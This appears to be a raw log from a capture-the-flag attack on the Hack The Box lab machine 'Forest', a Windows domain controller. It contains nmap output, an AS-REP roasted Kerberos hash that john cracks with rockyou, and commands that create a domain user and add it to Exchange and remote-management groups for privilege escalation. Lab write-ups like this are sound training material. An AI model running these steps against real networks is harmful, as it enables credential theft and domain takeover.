Nmap scan report for 10.10.10.161 Host is up (0.47s latency). Not shown: 989 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-25 13:36:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=5/25%OT=53%CT=1%CU=31288%PV=Y%DS=2%DC=T%G=Y%TM=628E2F6 OS:9%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS OS:=S%TS=A)SEQ(SP=102%GCD=1%ISR=10C%TI=I%CI=I%II=I%TS=A)OPS(O1=M54BNW8ST11% OS:O2=M54BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11 OS:)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W OS:=2000%O=M54BNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y OS:%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR OS:%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80 OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q OS:=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164 OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Host script results: _clock-skew: mean: 2h26m50s, deviation: 4h02m32s, median: 6m48s smb2-security-mode: 3.1.1: _ Message signing enabled and required smb-security-mode: account_used: guest authentication_level: user challenge_response: supported _ message_signing: required smb2-time: date: 2022-05-25T13:36:43 _ start_date: 2022-05-25T13:29:51 smb-os-discovery: OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) Computer name: FOREST NetBIOS computer name: FOREST\x00 Domain name: htb.local Forest name: htb.local FQDN: FOREST.htb.local _ System time: 2022-05-25T06:36:44-07:00
TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1 284.34 ms 10.10.16.1 2 572.39 ms 10.10.10.161
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 104.39 seconds
Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) ... [-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$svc-alfresco@HTB:dfbe818542456fa0a9e0b4f4d6643bf5$c9fdc9ef111989cd2bb751f53ca27c23f5f1c610703888f34fcbc3e0a5b7fe3014f1d5337fc10e621012fcd8ba6519ec7385aa027b42c3568669da12673a6623f98ccc5216e24bc3d3a787556cd91c6d4726520cc10d8c9035e2046f26e8bebc4b303d133afec216d8f6f6c3f6a0af8915ebe19b08e50b39fadea653b2d8fd8b233888bbea95583cdb0950000f8c788801f2cb5b23c30013c8a5bd7b3ddc1e6096f29e90b9f996b2472896038816741dc510140decaf86139e6e33c9a0bd8592b1afd56de00f100c1355575aa609ffe3280f6b4c5efa860220e3bd0cf0a0fcdb [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set ...
john --wordlist=/usr/share/wordlists/rockyou.txt pass
Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$23$svc-alfresco@HTB) 1g 0:00:00:08 DONE (2022-05-26 00:02) 0.1154g/s 476763p/s 476763c/s 476763C/s sadeceben19881905..ruddle68 Use the "--show" option to display all of the cracked passwords reliably Session completed.
#创建用户 net user gaoxiaodiao abc123! /add /domain net group "Exchange Windows Permissions" gaoxiaodiao /add net localgroup "Remote Management Users" gaoxiaodiao /add